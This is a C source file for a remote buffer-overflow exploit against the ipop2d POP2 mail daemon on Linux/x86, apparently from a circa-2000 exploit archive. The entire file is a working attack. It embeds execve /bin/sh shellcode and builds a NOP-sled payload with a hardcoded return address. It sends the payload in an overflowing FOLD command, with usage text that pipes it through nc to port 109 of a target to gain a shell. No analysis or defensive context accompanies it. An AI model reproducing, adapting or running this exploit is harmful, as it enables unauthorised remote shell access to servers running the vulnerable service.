/*
 * *working* ipop2d exploit for linux/x86
 * tested on redhat 5.2
 *
 * - rsh <dmk@slack.net>
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";


#define RET 0xbffff5a8

int main(int argc, char *argv[])
{
  char buf[1099];
  int off=0,b=1024,i,a=0;
  u_long *p;

  if(argc<4)
    {
      fprintf(stderr,"use: (%s <auth> <user> <pw> [offset];cat) | nc"
              " <target> 109\n",argv[0]);
      exit(1);
    }
  if(argv[4])
    off=atoi(argv[4]);
  b-=strlen(argv[1])+strlen(argv[2])+17;
  fprintf(stderr,"{!} buf size\t: %d\n{!} ret addr\t: %#x\n\n",b,RET-off);
  memset(buf,0x90,sizeof(buf));
  for(i=((b+4)-strlen(shellcode));i<(b+4);i++)
    buf[i]=shellcode[a++];
  p=(u_long *)(buf+(b+4));
  *p=(RET-off);
  buf[b+4+4]='\0';
  printf("HELO %s:%s %s\r\n",argv[1],argv[2],argv[3]);
  sleep(10);
  printf("FOLD %s\r\n",buf);
}
/*                    www.hack.co.za              [2000]*/